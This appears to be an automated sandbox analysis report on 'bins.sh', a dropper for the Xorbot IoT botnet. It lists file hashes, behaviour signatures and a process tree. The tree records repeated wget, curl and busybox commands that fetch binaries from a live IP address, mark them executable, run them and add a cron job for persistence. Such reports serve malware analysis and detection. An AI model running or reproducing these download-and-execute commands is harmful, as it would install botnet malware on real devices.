Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    30-11-2024 01:32

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    54298eb7fa7e229d5f14bd984a061988

  • SHA1

    4bef8f4344ac56b0a3e9ced6b7e219ec17d3e180

  • SHA256

    b6f1813eb89b53822bc7f914ab0ec6b3cf4434292e98c8cc3422b4c6f2b60f8d

  • SHA512

    c74e2aedf14c550d45d98dd011e4e083a341e0d505d50f48e260b04dcc0c4bd715989ed0e9d140f5c9a3659707368236b4d09c41e3743e781806db802c2e298d

  • SSDEEP

    96:/JZhtD+DcDkDmDvDrDZoCOfLlIUzF7UeQx8v+DcDkDmDvDrDwKHiffLlIUzxzEv0:xZhtD+ooS7/Foh5AmmooS7/qyu

Malware Config

Signatures

  • Detects Xorbot 4 IoCs
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

  • Xorbot family
  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 5 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 7 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:657
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:660
        • /usr/bin/wget
          wget http://216.126.231.240/bins/1yumZyRPlzlpXAH4T5Gil6jZmdesHftBC1
          2⤵
          • Writes file to tmp directory
          PID:667
        • /usr/bin/curl
          curl -O http://216.126.231.240/bins/1yumZyRPlzlpXAH4T5Gil6jZmdesHftBC1
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • Writes file to tmp directory
          PID:684
        • /bin/busybox
          /bin/busybox wget http://216.126.231.240/bins/1yumZyRPlzlpXAH4T5Gil6jZmdesHftBC1
          2⤵
          • Writes file to tmp directory
          PID:690
        • /bin/chmod
          chmod 777 1yumZyRPlzlpXAH4T5Gil6jZmdesHftBC1
          2⤵
          • File and Directory Permissions Modification
          PID:691
        • /tmp/1yumZyRPlzlpXAH4T5Gil6jZmdesHftBC1
          ./1yumZyRPlzlpXAH4T5Gil6jZmdesHftBC1
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Reads runtime system information
          PID:692
          • /bin/sh
            sh -c "crontab -l"
            3⤵
              PID:694
              • /usr/bin/crontab
                crontab -l
                4⤵
                  PID:695
              • /bin/sh
                sh -c "crontab -"
                3⤵
                  PID:696
                  • /usr/bin/crontab
                    crontab -
                    4⤵
                    • Creates/modifies Cron job
                    PID:697
              • /bin/rm
                rm 1yumZyRPlzlpXAH4T5Gil6jZmdesHftBC1
                2⤵
                  PID:700
                • /usr/bin/wget
                  wget http://216.126.231.240/bins/jQ4pCNbN5LxcDJLCZvPXPrl1ZjwHvfHxDn
                  2⤵
                    PID:702
                  • /usr/bin/curl
                    curl -O http://216.126.231.240/bins/jQ4pCNbN5LxcDJLCZvPXPrl1ZjwHvfHxDn
                    2⤵
                      PID:703
                    • /bin/busybox
                      /bin/busybox wget http://216.126.231.240/bins/jQ4pCNbN5LxcDJLCZvPXPrl1ZjwHvfHxDn
                      2⤵
                      • Writes file to tmp directory
                      PID:704
                    • /bin/chmod
                      chmod 777 jQ4pCNbN5LxcDJLCZvPXPrl1ZjwHvfHxDn
                      2⤵
                      • File and Directory Permissions Modification
                      PID:705
                    • /tmp/jQ4pCNbN5LxcDJLCZvPXPrl1ZjwHvfHxDn
                      ./jQ4pCNbN5LxcDJLCZvPXPrl1ZjwHvfHxDn
                      2⤵
                      • Executes dropped EXE
                      PID:706
                    • /bin/rm
                      rm jQ4pCNbN5LxcDJLCZvPXPrl1ZjwHvfHxDn
                      2⤵
                        PID:707
                      • /usr/bin/wget
                        wget http://216.126.231.240/bins/seYVGgU7lYYTroa7Ptxs1Yc9ac4Dng9xuD
                        2⤵
                          PID:708
                        • /usr/bin/curl
                          curl -O http://216.126.231.240/bins/seYVGgU7lYYTroa7Ptxs1Yc9ac4Dng9xuD
                          2⤵
                            PID:710
                          • /bin/busybox
                            /bin/busybox wget http://216.126.231.240/bins/seYVGgU7lYYTroa7Ptxs1Yc9ac4Dng9xuD
                            2⤵
                            • Writes file to tmp directory
                            PID:712
                          • /bin/chmod
                            chmod 777 seYVGgU7lYYTroa7Ptxs1Yc9ac4Dng9xuD
                            2⤵
                            • File and Directory Permissions Modification
                            PID:719
                          • /tmp/seYVGgU7lYYTroa7Ptxs1Yc9ac4Dng9xuD
                            ./seYVGgU7lYYTroa7Ptxs1Yc9ac4Dng9xuD
                            2⤵
                            • Executes dropped EXE
                            PID:720
                          • /bin/rm
                            rm seYVGgU7lYYTroa7Ptxs1Yc9ac4Dng9xuD
                            2⤵
                              PID:722
                            • /usr/bin/wget
                              wget http://216.126.231.240/bins/MSEG58Ao7K0XbqfbTAMBNZsbXWqoNMaheP
                              2⤵
                                PID:724
                              • /usr/bin/curl
                                curl -O http://216.126.231.240/bins/MSEG58Ao7K0XbqfbTAMBNZsbXWqoNMaheP
                                2⤵
                                  PID:725
                                • /bin/busybox
                                  /bin/busybox wget http://216.126.231.240/bins/MSEG58Ao7K0XbqfbTAMBNZsbXWqoNMaheP
                                  2⤵
                                  • Writes file to tmp directory
                                  PID:727
                                • /bin/chmod
                                  chmod 777 MSEG58Ao7K0XbqfbTAMBNZsbXWqoNMaheP
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:732
                                • /tmp/MSEG58Ao7K0XbqfbTAMBNZsbXWqoNMaheP
                                  ./MSEG58Ao7K0XbqfbTAMBNZsbXWqoNMaheP
                                  2⤵
                                  • Executes dropped EXE
                                  PID:734
                                • /bin/rm
                                  rm MSEG58Ao7K0XbqfbTAMBNZsbXWqoNMaheP
                                  2⤵
                                    PID:736
                                  • /usr/bin/wget
                                    wget http://216.126.231.240/bins/fExhjU2e7OGnfebjfxSKmr0Xf3LUYjQas1
                                    2⤵
                                      PID:738
                                    • /usr/bin/curl
                                      curl -O http://216.126.231.240/bins/fExhjU2e7OGnfebjfxSKmr0Xf3LUYjQas1
                                      2⤵
                                        PID:739
                                      • /bin/busybox
                                        /bin/busybox wget http://216.126.231.240/bins/fExhjU2e7OGnfebjfxSKmr0Xf3LUYjQas1
                                        2⤵
                                        • Writes file to tmp directory
                                        PID:741
                                      • /bin/chmod
                                        chmod 777 fExhjU2e7OGnfebjfxSKmr0Xf3LUYjQas1
                                        2⤵
                                        • File and Directory Permissions Modification
                                        PID:747
                                      • /tmp/fExhjU2e7OGnfebjfxSKmr0Xf3LUYjQas1
                                        ./fExhjU2e7OGnfebjfxSKmr0Xf3LUYjQas1
                                        2⤵
                                        • Executes dropped EXE
                                        PID:749
                                      • /bin/rm
                                        rm fExhjU2e7OGnfebjfxSKmr0Xf3LUYjQas1
                                        2⤵
                                          PID:750
                                        • /usr/bin/wget
                                          wget http://216.126.231.240/bins/XVbP57aLBqIZpRsQ9vxG8rsHAjWVMZsC7v
                                          2⤵
                                            PID:752

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • /tmp/1yumZyRPlzlpXAH4T5Gil6jZmdesHftBC1

                                          Filesize

                                          177KB

                                          MD5

                                          786d75a158fe731feca3880f436082c0

                                          SHA1

                                          79ea2734e43d00cdeabed5586b2c1994d02aef3e

                                          SHA256

                                          5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

                                          SHA512

                                          7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

                                        • /tmp/MSEG58Ao7K0XbqfbTAMBNZsbXWqoNMaheP

                                          Filesize

                                          117KB

                                          MD5

                                          849fa04ef88a8e8de32cb2e8538de5fe

                                          SHA1

                                          c768af29fe4b6695fff1541623e8bbd1c6f242f7

                                          SHA256

                                          8bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579

                                          SHA512

                                          2d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf

                                        • /tmp/fExhjU2e7OGnfebjfxSKmr0Xf3LUYjQas1

                                          Filesize

                                          119KB

                                          MD5

                                          1b166b95f9cb4b079ef1b9ec8363ddf3

                                          SHA1

                                          0d8eb08add467b3b5474f9b25909297fe7c2839c

                                          SHA256

                                          94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

                                          SHA512

                                          983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

                                        • /tmp/jQ4pCNbN5LxcDJLCZvPXPrl1ZjwHvfHxDn

                                          Filesize

                                          141KB

                                          MD5

                                          3ca8decdb1e52c423c521bfff02ac200

                                          SHA1

                                          8621ecd6807109b8541912ad9e134f6fb49bfd48

                                          SHA256

                                          dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

                                          SHA512

                                          b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

                                        • /tmp/seYVGgU7lYYTroa7Ptxs1Yc9ac4Dng9xuD

                                          Filesize

                                          122KB

                                          MD5

                                          cd3d4b9c643e5b473fb4d88ed05f0716

                                          SHA1

                                          64ee7a97418583d759eaea8000890cc3bae1b5f4

                                          SHA256

                                          0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944

                                          SHA512

                                          164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52

                                        • /var/spool/cron/crontabs/tmp.jAITaw

                                          Filesize

                                          210B

                                          MD5

                                          d0d1ed7951d5bb16ea344f7ec31ec730

                                          SHA1

                                          174fdc3ea02818d53c7388537f59aaade547b647

                                          SHA256

                                          d26fd673a43b51e96411cbee5fb376cc1478176e885988e5a017f217f86e1c0b

                                          SHA512

                                          aa68c7ca9d6c634f0d1d6900386225c2e6e181f3e87c628570f349d2cdc03a074d8b9e3e31009c9e63744b038898311427e521e36530edb1ec0ec0f625408f82